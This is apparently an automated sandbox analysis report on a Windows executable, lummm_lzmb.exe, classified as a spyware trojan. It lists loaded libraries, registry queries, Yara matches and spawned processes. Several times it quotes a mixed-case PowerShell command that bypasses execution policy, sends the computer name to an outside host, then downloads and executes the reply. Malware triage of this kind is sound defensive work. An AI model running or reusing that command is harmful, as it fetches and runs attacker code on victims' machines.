Source: C:\Users\user\Desktop\lummm_lzmb.exe	Code function: 1_2_007F0730	1_2_007F0730
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Code function: 1_2_007BEF20	1_2_007BEF20
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Code function: 1_2_007C7706	1_2_007C7706
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Code function: 1_2_007D8FB8	1_2_007D8FB8
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Code function: 1_2_007C8FB0	1_2_007C8FB0
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Code function: 1_2_007D1FA0	1_2_007D1FA0

Source: C:\Users\user\Desktop\lummm_lzmb.exe	Code function: String function: 007C4450 appears 110 times
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Code function: String function: 007B7FF0 appears 44 times

Source: lummm_lzmb.exe, 00000000.00000002.1713015095.000000000101E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs lummm_lzmb.exe
Source: lummm_lzmb.exe, 00000000.00000002.1714027294.0000000002EEA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilename vs lummm_lzmb.exe
Source: lummm_lzmb.exe, 00000000.00000002.1723635438.0000000003EB6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs lummm_lzmb.exe
Source: lummm_lzmb.exe, 00000000.00000002.1729064492.0000000006830000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameZyaambdlp.dll" vs lummm_lzmb.exe
Source: lummm_lzmb.exe, 00000000.00000002.1731278954.0000000006EE0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs lummm_lzmb.exe
Source: lummm_lzmb.exe, 00000000.00000002.1723635438.0000000003FF2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs lummm_lzmb.exe
Source: lummm_lzmb.exe, 00000000.00000000.1678021963.0000000000992000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamediumh.exe, vs lummm_lzmb.exe
Source: lummm_lzmb.exe, 00000000.00000002.1730655799.0000000006E20000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs lummm_lzmb.exe
Source: lummm_lzmb.exe	Binary or memory string: OriginalFilenamediumh.exe, vs lummm_lzmb.exe

Source: lummm_lzmb.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@6/3@4/4

Source: C:\Users\user\Desktop\lummm_lzmb.exe

Code function: 1_2_007EA140 RtlExpandEnvironmentStrings,CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW,

1_2_007EA140

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6416:120:WilError_03

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3xalb31n.svo.ps1

Jump to behavior

Source: lummm_lzmb.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: lummm_lzmb.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Source: C:\Users\user\Desktop\lummm_lzmb.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: lummm_lzmb.exe

Virustotal: Detection: 16%

Source: C:\Users\user\Desktop\lummm_lzmb.exe

File read: C:\Users\user\Desktop\lummm_lzmb.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\lummm_lzmb.exe "C:\Users\user\Desktop\lummm_lzmb.exe"
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Process created: C:\Users\user\Desktop\lummm_lzmb.exe "C:\Users\user\Desktop\lummm_lzmb.exe"
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; }
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Process created: C:\Users\user\Desktop\lummm_lzmb.exe "C:\Users\user\Desktop\lummm_lzmb.exe"	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; }	Jump to behavior

Source: C:\Users\user\Desktop\lummm_lzmb.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior

Source: C:\Users\user\Desktop\lummm_lzmb.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: C:\Users\user\Desktop\lummm_lzmb.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: lummm_lzmb.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: lummm_lzmb.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: lummm_lzmb.exe, 00000000.00000002.1731278954.0000000006EE0000.00000004.08000000.00040000.00000000.sdmp, lummm_lzmb.exe, 00000000.00000002.1723635438.0000000003FF2000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: lummm_lzmb.exe, 00000000.00000002.1731278954.0000000006EE0000.00000004.08000000.00040000.00000000.sdmp, lummm_lzmb.exe, 00000000.00000002.1723635438.0000000003FF2000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: protobuf-net.pdbSHA256}Lq source: lummm_lzmb.exe, 00000000.00000002.1723635438.0000000003EB6000.00000004.00000800.00020000.00000000.sdmp, lummm_lzmb.exe, 00000000.00000002.1730655799.0000000006E20000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: protobuf-net.pdb source: lummm_lzmb.exe, 00000000.00000002.1723635438.0000000003EB6000.00000004.00000800.00020000.00000000.sdmp, lummm_lzmb.exe, 00000000.00000002.1730655799.0000000006E20000.00000004.08000000.00040000.00000000.sdmp

Data Obfuscation

Suspicious powershell command line found

Source: C:\Users\user\Desktop\lummm_lzmb.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; }
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; }			Jump to behavior

Yara detected Costura Assembly Loader

Source: Yara match	File source: 0.2.lummm_lzmb.exe.6bd0000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.lummm_lzmb.exe.6bd0000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1714027294.0000000002EEA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1730312615.0000000006BD0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: lummm_lzmb.exe PID: 6348, type: MEMORYSTR

Source: C:\Users\user\Desktop\lummm_lzmb.exe	Code function: 0_2_012B8F51 push A002E52Ch; retf	0_2_012B8F85
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Code function: 0_2_02E471BB pushfd ; ret	0_2_02E471BC
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Code function: 0_2_056E58BD push ds; ret	0_2_056E58C7
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Code function: 0_2_075731B0 push eax; iretd	0_2_075731B7
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Code function: 0_2_07573DB0 push esi; ret	0_2_07573DB1
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Code function: 0_2_075761AE push ss; iretd	0_2_075761AF
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Code function: 0_2_075764FF push ebx; iretd	0_2_0757650A
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Code function: 1_2_007F0310 push eax; mov dword ptr [esp], 00030235h	1_2_007F0314

Source: C:\Users\user\Desktop\lummm_lzmb.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate			Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot			Jump to behavior

Source: C:\Users\user\Desktop\lummm_lzmb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
